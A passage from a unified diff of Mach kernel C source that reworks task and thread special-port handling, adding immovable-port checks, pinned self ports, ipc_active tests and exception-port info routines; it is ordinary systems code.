        case TASK_ACCESS_PORT:
                port = ipc_port_copy_send(task->itk_task_access);
+               itk_unlock(task);
                break;
 
        case TASK_DEBUG_CONTROL_PORT:
                port = ipc_port_copy_send(task->itk_debug_control);
+               itk_unlock(task);
                break;
 
        default:
@@ -1410,9 +1731,6 @@ task_get_special_port_internal(
                return KERN_INVALID_ARGUMENT;
        }
 
-       itk_unlock(task);
-
-copyout:
        *portp = port;
        return KERN_SUCCESS;
 }
@@ -1426,6 +1744,25 @@ task_get_special_port(
        return task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL);
 }
 
+static ipc_port_t
+task_get_non_substituted_self(task_t task)
+{
+       ipc_port_t port = IP_NULL;
+
+       itk_lock(task);
+       port = task->itk_settable_self;
+       if (IP_VALID(port)) {
+               ip_reference(port);
+       }
+       itk_unlock(task);
+
+       if (IP_VALID(port)) {
+               /* consumes the port reference */
+               return ipc_kobject_alloc_subst_once(port);
+       }
+
+       return port;
+}
 kern_return_t
 task_get_special_port_from_user(
        mach_port_t     port,
@@ -1433,29 +1770,49 @@ task_get_special_port_from_user(
        ipc_port_t      *portp)
 {
        ipc_kobject_type_t kotype;
-       kern_return_t kr;
+       mach_task_flavor_t flavor;
+       kern_return_t kr = KERN_SUCCESS;
 
-       task_t task = convert_port_to_task_check_type(port, &kotype, TASK_FLAVOR_INSPECT, FALSE);
+       task_t task = convert_port_to_task_check_type(port, &kotype,
+           TASK_FLAVOR_INSPECT, FALSE);
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (which == TASK_KERNEL_PORT && task == current_task()) {
+#if CONFIG_MACF
+               /*
+                * only check for current_task,
+                * because foreign task ports are always movable
+                */
+               if (mac_task_check_get_movable_control_port()) {
+                       kr = KERN_DENIED;
+                       goto out;
+               }
+#endif
+               if (kotype == IKOT_TASK_CONTROL) {
+                       *portp = task_get_non_substituted_self(task);
+                       goto out;
+               }
+       }
+
        switch (kotype) {
        case IKOT_TASK_CONTROL:
-               kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_CONTROL);
+               flavor = TASK_FLAVOR_CONTROL;
                break;
        case IKOT_TASK_READ:
-               kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_READ);
+               flavor = TASK_FLAVOR_READ;
                break;
        case IKOT_TASK_INSPECT:
-               kr = task_get_special_port_internal(task, which, portp, TASK_FLAVOR_INSPECT);
+               flavor = TASK_FLAVOR_INSPECT;
                break;
        default:
                panic("strange kobject type");
-               break;
        }
 
+       kr = task_get_special_port_internal(task, which, portp, flavor);
+out:
        task_deallocate(task);
        return kr;
 }
@@ -1504,11 +1861,12 @@ port_allowed_with_task_flavor(
  *             Nothing locked.  If successful, consumes
  *             the supplied send right.
  *     Returns:
- *             KERN_SUCCESS            Changed the special port.
+ *             KERN_SUCCESS                Changed the special port.
  *             KERN_INVALID_ARGUMENT   The task is null.
- *             KERN_FAILURE            The task/space is dead.
+ *      KERN_INVALID_RIGHT      Port is marked as immovable.
+ *             KERN_FAILURE                The task/space is dead.
  *             KERN_INVALID_ARGUMENT   Invalid special port.
- *      KERN_NO_ACCESS         Restricted access to set port.
+ *      KERN_NO_ACCESS             Restricted access to set port.
  */
 
 kern_return_t
@@ -1525,6 +1883,10 @@ task_set_special_port(
                return KERN_NO_ACCESS;
        }
 
+       if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) {
+               return KERN_INVALID_RIGHT;
+       }
+
        switch (which) {
        case TASK_KERNEL_PORT:
        case TASK_HOST_PORT:
@@ -1576,7 +1938,7 @@ task_set_special_port_internal(
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                rc = KERN_FAILURE;
                goto out_unlock;
        }
@@ -1649,7 +2011,8 @@ out:
  *             Nothing locked.  If successful, consumes
  *             the supplied rights and memory.
  *     Returns:
- *             KERN_SUCCESS            Stashed the port rights.
+ *             KERN_SUCCESS                Stashed the port rights.
+ *      KERN_INVALID_RIGHT      Port in array is marked immovable.
  *             KERN_INVALID_ARGUMENT   The task is null.
  *             KERN_INVALID_ARGUMENT   The task is dead.
  *             KERN_INVALID_ARGUMENT   The memory param is null.
@@ -1677,13 +2040,16 @@ mach_ports_register(
 
        for (i = 0; i < portsCnt; i++) {
                ports[i] = memory[i];
+               if (IP_VALID(ports[i]) && (ports[i]->ip_immovable_receive || ports[i]->ip_immovable_send)) {
+                       return KERN_INVALID_RIGHT;
+               }
        }
        for (; i < TASK_PORT_REGISTER_MAX; i++) {
                ports[i] = IP_NULL;
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
                return KERN_INVALID_ARGUMENT;
        }
@@ -1759,7 +2125,7 @@ mach_ports_lookup(
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
 
                kfree(memory, size);
@@ -1839,7 +2205,7 @@ task_conversion_eval(task_t caller, task_t victim)
  *     Conditions:
  *             Nothing locked, blocking OK.
  */
-task_t
+static task_t
 convert_port_to_locked_task(ipc_port_t port, boolean_t eval)
 {
        int try_failed_count = 0;
@@ -1886,7 +2252,7 @@ convert_port_to_locked_task(ipc_port_t port, boolean_t eval)
  *     Conditions:
  *             Nothing locked, blocking OK.
  */
-task_inspect_t
+static task_inspect_t
 convert_port_to_locked_task_inspect(ipc_port_t port)
 {
        int try_failed_count = 0;
@@ -1928,12 +2294,15 @@ convert_port_to_locked_task_inspect(ipc_port_t port)
  *     Conditions:
  *             Nothing locked, blocking OK.
  */
-task_read_t
-convert_port_to_locked_task_read(ipc_port_t port)
+static task_read_t
+convert_port_to_locked_task_read(
+       ipc_port_t port,
+       boolean_t  eval)
 {
        int try_failed_count = 0;
 
        while (IP_VALID(port)) {
+               task_t ct = current_task();
                task_read_t task;
 
                ip_lock(port);
@@ -1942,8 +2311,14 @@ convert_port_to_locked_task_read(ipc_port_t port)
                        ip_unlock(port);
                        return TASK_READ_NULL;
                }
-               task = (task_read_t)port->ip_kobject;
+               task = (task_read_t)ipc_kobject_get(port);
                assert(task != TASK_READ_NULL);
+
+               if (eval && task_conversion_eval(ct, task)) {
+                       ip_unlock(port);
+                       return TASK_READ_NULL;
+               }
+
                /*
                 * Normal lock ordering puts task_lock() before ip_lock().
                 * Attempt out-of-order locking here.
@@ -2174,7 +2549,8 @@ convert_port_to_task_inspect_locked(
 
 static task_read_t
 convert_port_to_task_read_locked(
-       ipc_port_t              port)
+       ipc_port_t port,
+       boolean_t  eval)
 {
        task_read_t task = TASK_READ_NULL;
 
@@ -2184,11 +2560,11 @@ convert_port_to_task_read_locked(
        if (ip_kotype(port) == IKOT_TASK_CONTROL ||
            ip_kotype(port) == IKOT_TASK_READ) {
                task_t ct = current_task();
-               task = (task_t)port->ip_kobject;
+               task = (task_read_t)ipc_kobject_get(port);
 
                assert(task != TASK_READ_NULL);
 
-               if (task_conversion_eval(ct, task)) {
+               if (eval && task_conversion_eval(ct, task)) {
                        return TASK_READ_NULL;
                }
 
@@ -2241,7 +2617,7 @@ convert_port_to_task_check_type(
                break;
        case IKOT_TASK_READ:
                if (at_most >= TASK_FLAVOR_READ) {
-                       task = convert_port_to_task_read(port);
+                       task = eval_check ? convert_port_to_task_read(port) : convert_port_to_task_read_no_eval(port);
                        if (task != TASK_READ_NULL) {
                                type = IKOT_TASK_READ;
                        }
@@ -2319,7 +2695,7 @@ convert_port_to_thread_check_type(
                break;
        case IKOT_THREAD_READ:
                if (at_most >= THREAD_FLAVOR_READ) {
-                       thread = convert_port_to_thread_read(port);
+                       thread = eval_check ? convert_port_to_thread_read(port) : convert_port_to_thread_read_no_eval(port);
                        if (thread != THREAD_READ_NULL) {
                                type = IKOT_THREAD_READ;
                        }
@@ -2387,7 +2763,7 @@ convert_port_to_space_check_type(
                break;
        case IKOT_TASK_READ:
                if (at_most >= TASK_FLAVOR_READ) {
-                       space = convert_port_to_space_read(port);
+                       space = eval_check ? convert_port_to_space_read(port) : convert_port_to_space_read_no_eval(port);
                        if (space != IPC_SPACE_READ_NULL) {
                                type = IKOT_TASK_READ;
                        }
@@ -2456,7 +2832,24 @@ convert_port_to_task_read(
        if (IP_VALID(port)) {
                ip_lock(port);
                if (ip_active(port)) {
-                       task = convert_port_to_task_read_locked(port);
+                       task = convert_port_to_task_read_locked(port, TRUE);
+               }
+               ip_unlock(port);
+       }
+
+       return task;
+}
+
+static task_read_t
+convert_port_to_task_read_no_eval(
+       ipc_port_t              port)
+{
+       task_read_t task = TASK_READ_NULL;
+
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               if (ip_active(port)) {
+                       task = convert_port_to_task_read_locked(port, FALSE);
                }
                ip_unlock(port);
        }
@@ -2519,7 +2912,7 @@ convert_port_to_space_with_flavor(
                task = convert_port_to_locked_task(port, eval);
                break;
        case TASK_FLAVOR_READ:
-               task = convert_port_to_locked_task_read(port);
+               task = convert_port_to_locked_task_read(port, eval);
                break;
        case TASK_FLAVOR_INSPECT:
                task = convert_port_to_locked_task_inspect(port);
@@ -2565,6 +2958,13 @@ convert_port_to_space_read(
        return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, TRUE);
 }
 
+static ipc_space_read_t
+convert_port_to_space_read_no_eval(
+       ipc_port_t      port)
+{
+       return convert_port_to_space_with_flavor(port, TASK_FLAVOR_READ, FALSE);
+}
+
 ipc_space_inspect_t
 convert_port_to_space_inspect(
        ipc_port_t      port)
@@ -2592,13 +2992,13 @@ convert_port_to_map_with_flavor(
 
        switch (flavor) {
        case TASK_FLAVOR_CONTROL:
-               task = convert_port_to_locked_task(port, TRUE);
+               task = convert_port_to_locked_task(port, TRUE); /* always eval */
                break;
        case TASK_FLAVOR_READ:
-               task = convert_port_to_locked_task_read(port);
+               task = convert_port_to_locked_task_read(port, TRUE); /* always eval */
                break;
        case TASK_FLAVOR_INSPECT:
-               task = convert_port_to_locked_task_inspect(port);
+               task = convert_port_to_locked_task_inspect(port); /* always no eval */
                break;
        default:
                task = TASK_NULL;
@@ -2628,7 +3028,7 @@ convert_port_to_map_with_flavor(
                pmap_require(map->pmap);
        }
 
-       vm_map_reference_swap(map);
+       vm_map_reference(map);
        task_unlock(task);
        return map;
 }
@@ -2758,7 +3158,7 @@ convert_port_to_thread_inspect_locked(
        if (ip_kotype(port) == IKOT_THREAD_CONTROL ||
            ip_kotype(port) == IKOT_THREAD_READ ||
            ip_kotype(port) == IKOT_THREAD_INSPECT) {
-               thread = (thread_inspect_t)port->ip_kobject;
+               thread = (thread_inspect_t)ipc_kobject_get(port);
                assert(thread != THREAD_INSPECT_NULL);
                thread_reference_internal((thread_t)thread);
        }
@@ -2794,7 +3194,8 @@ convert_port_to_thread_inspect(
  */
 static thread_read_t
 convert_port_to_thread_read_locked(
-       ipc_port_t              port)
+       ipc_port_t port,
+       boolean_t  eval)
 {
        thread_read_t thread = THREAD_READ_NULL;
 
@@ -2807,7 +3208,7 @@ convert_port_to_thread_read_locked(
                assert(thread != THREAD_READ_NULL);
 
                /* Use task conversion rules for thread control conversions */
-               if (task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) {
+               if (eval && task_conversion_eval(current_task(), thread->task) != KERN_SUCCESS) {
                        return THREAD_READ_NULL;
                }
 
@@ -2826,7 +3227,24 @@ convert_port_to_thread_read(
        if (IP_VALID(port)) {
                ip_lock(port);
                if (ip_active(port)) {
-                       thread = convert_port_to_thread_read_locked(port);
+                       thread = convert_port_to_thread_read_locked(port, TRUE);
+               }
+               ip_unlock(port);
+       }
+
+       return thread;
+}
+
+static thread_read_t
+convert_port_to_thread_read_no_eval(
+       ipc_port_t              port)
+{
+       thread_read_t thread = THREAD_READ_NULL;
+
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               if (ip_active(port)) {
+                       thread = convert_port_to_thread_read_locked(port, FALSE);
                }
                ip_unlock(port);
        }
@@ -2853,16 +3271,13 @@ convert_thread_to_port_with_flavor(
 
        thread_mtx_lock(thread);
 
-       if (thread->ith_self[THREAD_FLAVOR_CONTROL] == IP_NULL) {
+       if (!thread->ipc_active) {
                goto exit;
        }
 
        if (flavor == THREAD_FLAVOR_CONTROL) {
-               port = ipc_port_make_send(thread->ith_self[flavor]);
+               port = ipc_port_make_send(thread->ith_thread_ports[flavor]);
        } else {
-               if (!thread->active) {
-                       goto exit;
-               }
                ipc_kobject_type_t kotype = (flavor == THREAD_FLAVOR_READ) ? IKOT_THREAD_READ : IKOT_THREAD_INSPECT;
                /*
                 * Claim a send right on the thread read/inspect port, and request a no-senders
@@ -2873,9 +3288,9 @@ convert_thread_to_port_with_flavor(
                 * send-once notification firing, and this is done under the thread mutex
                 * rather than with atomics.
                 */
-               (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_self[flavor], (ipc_kobject_t)thread,
-                   kotype, false, 0);
-               port = thread->ith_self[flavor];
+               (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_thread_ports[flavor], (ipc_kobject_t)thread,
+                   kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, false, 0);
+               port = thread->ith_thread_ports[flavor];
        }
 
 exit:
@@ -2977,7 +3392,7 @@ port_name_to_task_read(
        if (MACH_PORT_VALID(name)) {
                kr = ipc_port_translate_send(current_space(), name, &kport);
                if (kr == KERN_SUCCESS) {
-                       tr = convert_port_to_task_read_locked(kport);
+                       tr = convert_port_to_task_read_locked(kport, TRUE);
                        ip_unlock(kport);
                }
        }
@@ -2989,8 +3404,7 @@ port_name_to_task_read(
  *     Purpose:
  *             Convert from a port name to a task reference
  *             A name of MACH_PORT_NULL is valid for the null task.
- *             It doesnt run the task_conversion_eval check if the port
- *             is of type IKOT_TASK_CONTROL.
+ *             Skips task_conversion_eval() during conversion.
  *     Conditions:
  *             Nothing locked.
  */
@@ -3005,48 +3419,13 @@ port_name_to_task_read_no_eval(
        if (MACH_PORT_VALID(name)) {
                kr = ipc_port_translate_send(current_space(), name, &kport);
                if (kr == KERN_SUCCESS) {
-                       switch (ip_kotype(kport)) {
-                       case IKOT_TASK_CONTROL:
-                               tr = convert_port_to_task_locked(kport, NULL, FALSE);
-                               break;
-                       case IKOT_TASK_READ:
-                               tr = convert_port_to_task_read_locked(kport);
-                               break;
-                       default:
-                               break;
-                       }
+                       tr = convert_port_to_task_read_locked(kport, FALSE);
                        ip_unlock(kport);
                }
        }
        return tr;
 }
 
-/*
- *     Routine:        port_name_to_task_inspect
- *     Purpose:
- *             Convert from a port name to a task reference
- *             A name of MACH_PORT_NULL is valid for the null task.
- *     Conditions:
- *             Nothing locked.
- */
-task_inspect_t
-port_name_to_task_inspect(
-       mach_port_name_t name)
-{
-       ipc_port_t kport;
-       kern_return_t kr;
-       task_inspect_t ti = TASK_INSPECT_NULL;
-
-       if (MACH_PORT_VALID(name)) {
-               kr = ipc_port_translate_send(current_space(), name, &kport);
-               if (kr == KERN_SUCCESS) {
-                       ti = convert_port_to_task_inspect_locked(kport);
-                       ip_unlock(kport);
-               }
-       }
-       return ti;
-}
-
 /*
  *     Routine:        port_name_to_task_name
  *     Purpose:
@@ -3118,10 +3497,14 @@ convert_task_to_port_with_flavor(
 
        itk_lock(task);
 
+       if (!task->ipc_active) {
+               goto exit;
+       }
+
        switch (flavor) {
        case TASK_FLAVOR_CONTROL:
        case TASK_FLAVOR_NAME:
-               port = ipc_port_make_send(task->itk_self[flavor]);
+               port = ipc_port_make_send(task->itk_task_ports[flavor]);
                break;
        /*
         * Claim a send right on the task read/inspect port, and request a no-senders
@@ -3133,14 +3516,11 @@ convert_task_to_port_with_flavor(
         */
        case TASK_FLAVOR_READ:
        case TASK_FLAVOR_INSPECT:
-               if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
-                       /* task is either disabled or terminated */
-                       goto exit;
-               }
                kotype = (flavor == TASK_FLAVOR_READ) ? IKOT_TASK_READ : IKOT_TASK_INSPECT;
-               (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_self[flavor],
-                   (ipc_kobject_t)task, kotype, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_self"));
-               port = task->itk_self[flavor];
+               (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_task_ports[flavor],
+                   (ipc_kobject_t)task, kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, true,
+                   OS_PTRAUTH_DISCRIMINATOR("task.itk_task_ports"));
+               port = task->itk_task_ports[flavor];
 
                break;
        }
@@ -3179,6 +3559,22 @@ convert_task_name_to_port(
        return convert_task_to_port_with_flavor(task, TASK_FLAVOR_NAME);
 }
 
+ipc_port_t
+convert_task_to_port_pinned(
+       task_t          task)
+{
+       ipc_port_t port = IP_NULL;
+
+       itk_lock(task);
+
+       if (task->ipc_active && task->itk_self != IP_NULL) {
+               port = ipc_port_make_send(task->itk_self);
+       }
+
+       itk_unlock(task);
+       task_deallocate(task);
+       return port;
+}
 /*
  *     Routine:        convert_task_suspend_token_to_port
  *     Purpose:
@@ -3218,6 +3614,22 @@ convert_task_suspension_token_to_port(
        return port;
 }
 
+ipc_port_t
+convert_thread_to_port_pinned(
+       thread_t                thread)
+{
+       ipc_port_t              port = IP_NULL;
+
+       thread_mtx_lock(thread);
+
+       if (thread->ipc_active && thread->ith_self != IP_NULL) {
+               port = ipc_port_make_send(thread->ith_self);
+       }
+
+       thread_mtx_unlock(thread);
+       thread_deallocate(thread);
+       return port;
+}
 /*
  *     Routine:        space_deallocate
  *     Purpose:
@@ -3377,7 +3789,7 @@ thread_set_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3436,9 +3848,8 @@ task_set_exception_ports(
 
        itk_lock(task);
 
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
-
                return KERN_FAILURE;
        }
 
@@ -3471,7 +3882,7 @@ task_set_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3620,7 +4031,7 @@ thread_swap_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3681,7 +4092,7 @@ task_swap_exception_ports(
 
        itk_lock(task);
 
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
 #if CONFIG_MACF
                mac_exc_free_label(new_label);
@@ -3740,7 +4151,7 @@ task_swap_exception_ports(
                }
        }
 
-       if (IP_VALID(new_port)) {        /* consume send right */
+       if (IP_VALID(new_port)) {         /* consume send right */
                ipc_port_release_send(new_port);
        }
 
@@ -3767,27 +4178,21 @@ task_swap_exception_ports(
  *                                     Illegal mask bit set.
  *             KERN_FAILURE            The thread is dead.
  */
-kern_return_t
-thread_get_exception_ports(
-       thread_t                                        thread,
-       exception_mask_t                        exception_mask,
-       exception_mask_array_t          masks,
-       mach_msg_type_number_t          *CountCnt,
-       exception_port_array_t          ports,
-       exception_behavior_array_t      behaviors,
-       thread_state_flavor_array_t     flavors);
-
-kern_return_t
-thread_get_exception_ports(
-       thread_t                                        thread,
-       exception_mask_t                        exception_mask,
+static kern_return_t
+thread_get_exception_ports_internal(
+       thread_t                        thread,
+       exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
        mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
        exception_port_array_t          ports,
        exception_behavior_array_t      behaviors,
        thread_state_flavor_array_t     flavors)
 {
-       unsigned int    i, j, count;
+       unsigned int count;
+       boolean_t info_only = (ports_info != NULL);
+       boolean_t dbg_ok = TRUE;
+       ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, does not hold right */
 
        if (thread == THREAD_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -3797,6 +4202,18 @@ thread_get_exception_ports(
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (!info_only && !ports) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF
+       if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) {
+               dbg_ok = TRUE;
+       } else {
+               dbg_ok = FALSE;
+       }
+#endif
+
        thread_mtx_lock(thread);
 
        if (!thread->active) {
@@ -3811,30 +4228,45 @@ thread_get_exception_ports(
                goto done;
        }
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) {
+       for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) {
                if (exception_mask & (1 << i)) {
+                       ipc_port_t exc_port = thread->exc_actions[i].port;
+                       exception_behavior_t exc_behavior = thread->exc_actions[i].behavior;
+                       thread_state_flavor_t exc_flavor = thread->exc_actions[i].flavor;
+
                        for (j = 0; j < count; ++j) {
                                /*
                                 * search for an identical entry, if found
                                 * set corresponding mask for this exception.
                                 */
-                               if (thread->exc_actions[i].port == ports[j] &&
-                                   thread->exc_actions[i].behavior == behaviors[j] &&
-                                   thread->exc_actions[i].flavor == flavors[j]) {
+                               if (exc_port == port_ptrs[j] &&
+                                   exc_behavior == behaviors[j] &&
+                                   exc_flavor == flavors[j]) {
                                        masks[j] |= (1 << i);
                                        break;
                                }
                        }
 
-                       if (j == count) {
+                       if (j == count && count < *CountCnt) {
                                masks[j] = (1 << i);
-                               ports[j] = ipc_port_copy_send(thread->exc_actions[i].port);
-                               behaviors[j] = thread->exc_actions[i].behavior;
-                               flavors[j] = thread->exc_actions[i].flavor;
-                               ++count;
-                               if (count >= *CountCnt) {
-                                       break;
+                               port_ptrs[j] = exc_port;
+
+                               if (info_only) {
+                                       if (!dbg_ok || !IP_VALID(exc_port)) {
+                                               /* avoid taking port lock if !dbg_ok */
+                                               ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 };
+                                       } else {
+                                               uintptr_t receiver;
+                                               (void)ipc_port_get_receiver_task(exc_port, &receiver);
+                                               ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port);
+                                               ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0;
+                                       }
+                               } else {
+                                       ports[j] = ipc_port_copy_send(exc_port);
                                }
+                               behaviors[j] = exc_behavior;
+                               flavors[j] = exc_flavor;
+                               ++count;
                        }
                }
        }
@@ -3847,51 +4279,84 @@ done:
        return KERN_SUCCESS;
 }
 
+static kern_return_t
+thread_get_exception_ports(
+       thread_t                        thread,
+       exception_mask_t                exception_mask,
+       exception_mask_array_t          masks,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_array_t          ports,
+       exception_behavior_array_t      behaviors,
+       thread_state_flavor_array_t     flavors)
+{
+       return thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt,
+                  NULL, ports, behaviors, flavors);
+}
+
 kern_return_t
-thread_get_exception_ports_from_user(
+thread_get_exception_ports_info(
        mach_port_t                     port,
        exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
-       mach_msg_type_number_t         *CountCnt,
-       exception_port_array_t          ports,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
        exception_behavior_array_t      behaviors,
        thread_state_flavor_array_t     flavors)
 {
        kern_return_t kr;
 
-       thread_t thread = convert_port_to_thread_check_type(port, NULL, THREAD_FLAVOR_CONTROL, FALSE);
+       thread_t thread = convert_port_to_thread_read_no_eval(port);
 
        if (thread == THREAD_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
 
-       kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors);
+       kr = thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt,
+           ports_info, NULL, behaviors, flavors);
 
        thread_deallocate(thread);
        return kr;
 }
 
 kern_return_t
-task_get_exception_ports(
-       task_t                                          task,
-       exception_mask_t                        exception_mask,
+thread_get_exception_ports_from_user(
+       mach_port_t                     port,
+       exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
-       mach_msg_type_number_t          *CountCnt,
+       mach_msg_type_number_t         *CountCnt,
        exception_port_array_t          ports,
        exception_behavior_array_t      behaviors,
-       thread_state_flavor_array_t     flavors);
+       thread_state_flavor_array_t     flavors)
+{
+       kern_return_t kr;
 
-kern_return_t
-task_get_exception_ports(
-       task_t                                          task,
-       exception_mask_t                        exception_mask,
+       thread_t thread = convert_port_to_thread_no_eval(port);
+
+       if (thread == THREAD_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors);
+
+       thread_deallocate(thread);
+       return kr;
+}
+
+static kern_return_t
+task_get_exception_ports_internal(
+       task_t                          task,
+       exception_mask_t                exception_mask,
        exception_mask_array_t          masks,
        mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
        exception_port_array_t          ports,
        exception_behavior_array_t      behaviors,
        thread_state_flavor_array_t     flavors)
 {
-       unsigned int    i, j, count;
+       unsigned int count;
+       boolean_t info_only = (ports_info != NULL);
+       boolean_t dbg_ok = TRUE;
+       ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, does not hold right */
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -3901,40 +4366,66 @@ task_get_exception_ports(
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (!info_only && !ports) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF
+       if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) {
+               dbg_ok = TRUE;
+       } else {
+               dbg_ok = FALSE;
+       }
+#endif
+
        itk_lock(task);
 
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
-
                return KERN_FAILURE;
        }
 
        count = 0;
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) {
+       for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) {
                if (exception_mask & (1 << i)) {
+                       ipc_port_t exc_port = task->exc_actions[i].port;
+                       exception_behavior_t exc_behavior = task->exc_actions[i].behavior;
+                       thread_state_flavor_t exc_flavor = task->exc_actions[i].flavor;
+
                        for (j = 0; j < count; ++j) {
                                /*
                                 * search for an identical entry, if found
                                 * set corresponding mask for this exception.
                                 */
-                               if (task->exc_actions[i].port == ports[j] &&
-                                   task->exc_actions[i].behavior == behaviors[j] &&
-                                   task->exc_actions[i].flavor == flavors[j]) {
+                               if (exc_port == port_ptrs[j] &&
+                                   exc_behavior == behaviors[j] &&
+                                   exc_flavor == flavors[j]) {
                                        masks[j] |= (1 << i);
                                        break;
                                }
                        }
 
-                       if (j == count) {
+                       if (j == count && count < *CountCnt) {
                                masks[j] = (1 << i);
-                               ports[j] = ipc_port_copy_send(task->exc_actions[i].port);
-                               behaviors[j] = task->exc_actions[i].behavior;
-                               flavors[j] = task->exc_actions[i].flavor;
-                               ++count;
-                               if (count > *CountCnt) {
-                                       break;
+                               port_ptrs[j] = exc_port;
+
+                               if (info_only) {
+                                       if (!dbg_ok || !IP_VALID(exc_port)) {
+                                               /* avoid taking port lock if !dbg_ok */
+                                               ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 };
+                                       } else {
+                                               uintptr_t receiver;
+                                               (void)ipc_port_get_receiver_task(exc_port, &receiver);
+                                               ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port);
+                                               ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0;
+                                       }
+                               } else {
+                                       ports[j] = ipc_port_copy_send(exc_port);
                                }
+                               behaviors[j] = exc_behavior;
+                               flavors[j] = exc_flavor;
+                               ++count;
                        }
                }
        }
@@ -3946,6 +4437,45 @@ task_get_exception_ports(
        return KERN_SUCCESS;
 }
 
+static kern_return_t
+task_get_exception_ports(
+       task_t                          task,
+       exception_mask_t                exception_mask,
+       exception_mask_array_t          masks,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_array_t          ports,
+       exception_behavior_array_t      behaviors,
+       thread_state_flavor_array_t     flavors)
+{
+       return task_get_exception_ports_internal(task, exception_mask, masks, CountCnt,
+                  NULL, ports, behaviors, flavors);
+}
+
+kern_return_t
+task_get_exception_ports_info(
+       mach_port_t                     port,
+       exception_mask_t                exception_mask,
+       exception_mask_array_t          masks,
+       mach_msg_type_number_t          *CountCnt,
+       exception_port_info_array_t     ports_info,
+       exception_behavior_array_t      behaviors,
+       thread_state_flavor_array_t     flavors)
+{
+       kern_return_t kr;
+
+       task_t task = convert_port_to_task_read_no_eval(port);
+
+       if (task == TASK_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       kr = task_get_exception_ports_internal(task, exception_mask, masks, CountCnt,
+           ports_info, NULL, behaviors, flavors);
+
+       task_deallocate(task);
+       return kr;
+}
+
 kern_return_t
 task_get_exception_ports_from_user(
        mach_port_t                     port,
@@ -3958,7 +4488,7 @@ task_get_exception_ports_from_user(
 {
        kern_return_t kr;
 
-       task_t task = convert_port_to_task_check_type(port, NULL, TASK_FLAVOR_CONTROL, FALSE);
